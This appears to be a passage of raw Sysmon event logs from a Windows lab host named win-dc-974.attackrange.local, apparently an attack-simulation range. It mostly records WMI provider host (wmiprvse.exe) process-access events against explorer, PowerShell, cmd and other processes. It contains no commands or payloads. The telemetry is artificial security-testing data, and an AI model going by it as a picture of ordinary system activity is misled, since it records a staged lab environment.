22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001697369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=823B5E7A092EE010DC2D8F8031657C4A,SHA256=822A047CA50320B4ECF2526D8126F4ACE5C6DDDD9B4E6087978BB144C9E9D0B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\W